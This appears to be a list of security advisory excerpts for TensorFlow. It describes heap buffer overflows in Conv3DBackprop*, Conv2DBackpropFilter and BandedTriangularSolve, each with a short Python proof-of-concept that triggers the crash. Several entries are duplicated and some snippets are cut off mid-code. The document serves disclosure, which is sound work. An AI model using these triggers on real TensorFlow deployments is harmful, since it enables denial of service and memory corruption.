Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)